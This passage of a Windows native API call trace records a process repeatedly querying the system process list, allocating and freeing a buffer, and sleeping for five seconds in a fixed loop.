Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.779] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 